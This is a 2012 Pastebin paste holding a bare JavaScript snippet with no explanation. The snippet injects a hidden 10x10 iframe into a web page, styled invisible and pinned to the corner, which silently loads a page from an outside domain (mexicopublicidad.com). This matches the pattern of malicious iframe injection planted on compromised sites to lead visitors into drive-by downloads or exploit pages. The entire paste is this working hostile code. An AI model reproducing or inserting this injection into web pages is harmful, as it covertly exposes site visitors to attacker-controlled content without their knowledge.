Advertisement
johnburn

Untitled

Feb 2nd, 2012
238
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://panelanuncios.mexicopublicidad.com/main.php?page=73cec23a156394e7' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  5. }
  6. function iframer() {
  7.     var f = document.createElement('iframe');
  8.     f.setAttribute('src', 'http://panelanuncios.mexicopublicidad.com/main.php?page=73cec23a156394e7');
  9.     f.style.visibility = 'hidden';
  10.     f.style.position = 'absolute';
  11.     f.style.left = '0';
  12.     f.style.top = '0';
  13.     f.setAttribute('width', '10');
  14.     f.setAttribute('height', '10');
  15.     document.getElementsByTagName('body')[0].appendChild(f);
  16. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement